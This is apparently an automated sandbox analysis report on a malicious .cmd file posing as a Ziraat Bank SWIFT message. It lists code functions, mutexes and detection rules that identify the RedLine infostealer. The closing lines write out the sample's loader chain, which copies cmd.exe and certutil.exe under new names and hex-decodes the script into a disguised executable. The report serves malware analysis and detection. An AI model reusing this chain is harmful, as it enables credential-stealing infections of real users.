                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A473F812_2_00007FF627A473F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6B36C12_2_00007FF627A6B36C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2B3AC12_2_00007FF627B2B3AC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7734012_2_00007FF627A77340
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB92D812_2_00007FF627AB92D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9D2C012_2_00007FF627A9D2C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA92C412_2_00007FF627AA92C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4F2C012_2_00007FF627A4F2C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD531812_2_00007FF627AD5318
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1D2B412_2_00007FF627B1D2B4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF529012_2_00007FF627AF5290
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A931E012_2_00007FF627A931E0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A911C812_2_00007FF627A911C8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5D1B812_2_00007FF627A5D1B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF16812_2_00007FF627ACF168
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAC0B812_2_00007FF627AAC0B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1208412_2_00007FF627B12084
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7808012_2_00007FF627A78080
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA801812_2_00007FF627AA8018
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF9FF812_2_00007FF627AF9FF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A41F8012_2_00007FF627A41F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC9EE412_2_00007FF627AC9EE4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A91ED012_2_00007FF627A91ED0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD5F0412_2_00007FF627AD5F04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACBE7012_2_00007FF627ACBE70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDEB012_2_00007FF627ACDEB0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9DEA412_2_00007FF627A9DEA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A51DE812_2_00007FF627A51DE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD1E2C12_2_00007FF627AD1E2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A75DF712_2_00007FF627A75DF7
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA1D7012_2_00007FF627AA1D70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF7D7012_2_00007FF627AF7D70
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4DD8412_2_00007FF627B4DD84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A99D6C12_2_00007FF627A99D6C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADBDA012_2_00007FF627ADBDA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9BCE812_2_00007FF627A9BCE8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A79CD012_2_00007FF627A79CD0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B09CC012_2_00007FF627B09CC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7DD2012_2_00007FF627A7DD20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A55D0812_2_00007FF627A55D08
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A93C6012_2_00007FF627A93C60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4FC9012_2_00007FF627B4FC90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5BCA412_2_00007FF627A5BCA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC1C9012_2_00007FF627AC1C90
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AADBF012_2_00007FF627AADBF0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A69BC812_2_00007FF627A69BC8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9FC3412_2_00007FF627A9FC34
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7FC2012_2_00007FF627A7FC20
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF3C1012_2_00007FF627AF3C10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD7B7412_2_00007FF627AD7B74
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEFB5012_2_00007FF627AEFB50
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A45BA412_2_00007FF627A45BA4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB1B8412_2_00007FF627AB1B84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A4FB8412_2_00007FF627A4FB84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA7AC812_2_00007FF627AA7AC8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0BB2812_2_00007FF627B0BB28
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A91A6012_2_00007FF627A91A60
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF9A5812_2_00007FF627AF9A58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABBA4812_2_00007FF627ABBA48
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A73A4012_2_00007FF627A73A40
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A57AB412_2_00007FF627A57AB4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F9B812_2_00007FF627A6F9B8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A41A1012_2_00007FF627A41A10
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3793812_2_00007FF627B37938
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC19AC12_2_00007FF627AC19AC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B3994C12_2_00007FF627B3994C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF99012_2_00007FF627ACF990
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF20C415_2_02DF20C4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB341016_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC37D816_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC785416_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB8DF816_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC555416_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBAA5416_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB6BE016_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAFBC16_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB3F9016_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB5B7016_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB9B5016_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB372C16_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB851016_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBB0D816_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC18D416_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB188416_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAC4C16_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB2C4816_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBCE1016_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDD9D016_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB81D416_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EE153816_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB7D3016_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7F0016_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB6EE416_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDEE8816_2_00007FF706EDEE88
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBE68016_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC0A6C16_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EBD25016_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB9E5016_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB765016_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB524016_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB4A3016_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EDAA3016_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB222016_2_00007FF706EB2220
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC422416_2_00007FF706EC4224
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB341017_2_00007FF706EB3410
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC37D817_2_00007FF706EC37D8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC785417_2_00007FF706EC7854
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB8DF817_2_00007FF706EB8DF8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC555417_2_00007FF706EC5554
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBAA5417_2_00007FF706EBAA54
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB6BE017_2_00007FF706EB6BE0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAFBC17_2_00007FF706EDAFBC
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB3F9017_2_00007FF706EB3F90
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB5B7017_2_00007FF706EB5B70
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB9B5017_2_00007FF706EB9B50
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB372C17_2_00007FF706EB372C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB851017_2_00007FF706EB8510
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBB0D817_2_00007FF706EBB0D8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC18D417_2_00007FF706EC18D4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB188417_2_00007FF706EB1884
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAC4C17_2_00007FF706EDAC4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB2C4817_2_00007FF706EB2C48
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBCE1017_2_00007FF706EBCE10
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDD9D017_2_00007FF706EDD9D0
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB81D417_2_00007FF706EB81D4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EE153817_2_00007FF706EE1538
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB7D3017_2_00007FF706EB7D30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7F0017_2_00007FF706ED7F00
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB6EE417_2_00007FF706EB6EE4
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDEE8817_2_00007FF706EDEE88
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBE68017_2_00007FF706EBE680
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC0A6C17_2_00007FF706EC0A6C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EBD25017_2_00007FF706EBD250
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB9E5017_2_00007FF706EB9E50
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB765017_2_00007FF706EB7650
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB524017_2_00007FF706EB5240
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB4A3017_2_00007FF706EB4A30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EDAA3017_2_00007FF706EDAA30
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB222017_2_00007FF706EB2220
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC422417_2_00007FF706EC4224
                      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF706EC498C appears 40 times
                      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF706EC081C appears 36 times
                      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF706EC3448 appears 72 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B00D10 appears 181 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627AFABFC appears 818 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B564A6 appears 173 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B07D70 appears 35 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627A4D1C8 appears 41 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B4F11C appears 37 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B4F1B8 appears 183 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627B07BAC appears 34 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627ADEB98 appears 93 times
                      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF627A7BC9C appears 280 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02E089D0 appears 45 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DF44DC appears 74 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DF46D4 appears 244 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DF4500 appears 33 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DF4860 appears 949 times
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02E0894C appears 56 times
                      Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                      Source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 27.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 43.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 27.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 43.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: armsvc.exe.25.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: alg.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: AppVClient.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: DiagnosticsHub.StandardCollector.Service.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: FXSSVC.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: armsvc.exe.25.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: alg.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: AppVClient.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: DiagnosticsHub.StandardCollector.Service.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: FXSSVC.exe.27.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.spre.bank.troj.spyw.evad.winCMD@61/169@305/22
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,9_2_00007FF706EB32B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,12_2_00007FF627B2826C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EDFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,9_2_00007FF706EDFB54
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A846C0 CoCreateInstance,#357,SysFreeString,12_2_00007FF627A846C0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B06320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,12_2_00007FF627B06320
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMutant created: NULL
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab2-inf
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab2cd68e75b-b
                      Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-8c4bfd40d4df6ab29ea72c54-b
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: alg.exe, 0000001D.00000003.2787263519.0000000000420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdReversingLabs: Detection: 13%
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
